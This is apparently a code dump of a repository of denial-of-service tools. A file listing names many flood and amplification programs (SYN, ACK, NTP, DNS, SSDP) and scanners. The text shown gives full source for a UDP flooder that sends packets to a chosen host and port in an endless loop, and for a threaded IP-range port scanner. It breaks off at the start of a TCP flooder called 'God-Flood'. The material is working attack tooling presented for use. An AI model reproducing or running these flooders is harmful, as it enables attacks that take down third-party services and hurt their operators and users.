├── std.c.c ├── portscan.py.py ├── god-flood(tcp ├── god-flood-v2(tcp ├── README.md ├── rawudp.c.c ├── vse.c.c ├── telnet.c.c ├── ntp_scanner.c.c ├── ack.c.c ├── syn.c.c ├── dominate.c.c ├── ntp.c.c ├── rssyn.c.c ├── xack.c.c ├── sack.c.c ├── essyn.c.c ├── xsyn.c.c ├── ssdp.c.c ├── dns_scanner.c.c ├── ssdp_scanner.c.c ├── dns.c.c ├── Flood.c └── kaitenstd.c.c /std.c.c: -------------------------------------------------------------------------------- 1 | #define STD2_STRING "std" 2 | #define STD2_SIZE 50 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | int echo_connect(char *, short); 12 | 13 | int echo_connect(char *server, short port) 14 | { 15 | struct sockaddr_in sin; 16 | struct hostent *hp; 17 | int thesock; 18 | hp = gethostbyname(server); 19 | if (hp==NULL) { 20 | printf("Unknown host: %s\n",server); 21 | exit(0); 22 | } 23 | printf(" STD.C -- Packeting %s:%d\n ", server, port); 24 | bzero((char*) &sin,sizeof(sin)); 25 | bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); 26 | sin.sin_family = hp->h_addrtype; 27 | sin.sin_port = htons(port); 28 | thesock = socket(AF_INET, SOCK_DGRAM, 0); 29 | connect(thesock,(struct sockaddr *) &sin, sizeof(sin)); 30 | return thesock; 31 | } 32 | 33 | 34 | main(int argc, char **argv) 35 | { 36 | int s; 37 | if(argc != 3) 38 | { 39 | fprintf(stderr, "[STD2.C BY STACKD] Syntax: %s host port\n",argv[0]); 40 | exit(0); 41 | } 42 | s=echo_connect(argv[1], atoi(argv[2])); 43 | for(;;) 44 | { 45 | send(s, STD2_STRING, STD2_SIZE, 0); 46 | } 47 | } -------------------------------------------------------------------------------- /portscan.py.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #Made By LiGhT 3 | 4 | import socket, sys, os, threading 5 | 6 | if len(sys.argv) < 5: 7 | sys.exit("Usage: python "+sys.argv[0]+" [start-range] [end-range] [port] [output-file]") 8 | sys.exit() 9 | 10 | port = int(sys.argv[3]) 11 | outputF = sys.argv[4] 12 | 13 | def ipRange(start_ip, end_ip): 14 | start = list(map(int, start_ip.split("."))) 15 | end = list(map(int, end_ip.split("."))) 16 | temp = start 17 | ip_range = [] 18 | 19 | ip_range.append(start_ip) 20 | while temp != end: 21 | start[3] += 1 22 | for i in (3, 2, 1): 23 | if temp[i] == 256: 24 | temp[i] = 0 25 | temp[i-1] += 1 26 | ip_range.append(".".join(map(str, temp))) 27 | 28 | return ip_range 29 | 30 | class p0r75c4n(threading.Thread): 31 | def __init__ (self, ip): 32 | threading.Thread.__init__(self) 33 | def run(self): 34 | x = 1 35 | while x != 0: 36 | try: 37 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | result = sock.connect_ex((ip, port)) 39 | if result == 0: 40 | os.system("echo "+ip+" >> "+outputF+"") 41 | print "\033[32mGood:\033[37m "+ip 42 | elif result != 0: 43 | print "\033[31mBad:\033[37m "+ip 44 | sock.close() 45 | except: 46 | pass 47 | x = 0 48 | ip_range = ipRange("" +sys.argv[1], "" +sys.argv[2]) 49 | for ip in ip_range: 50 | try: 51 | t = p0r75c4n(ip) 52 | t.start() 53 | except: 54 | pass #MAY CRASH SERVER LMFAOOO DRUNK AF WHEN MADE THS -------------------------------------------------------------------------------- /god-flood(tcp: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # God-Flood by LiGhT 3 | import socket, random, time, os, sys 4 | 5 | if len(sys.argv) < 5: 6 | print "God-Flood By LiGhT" 7 | sys.exit("Usage: python "+sys.argv[0]+"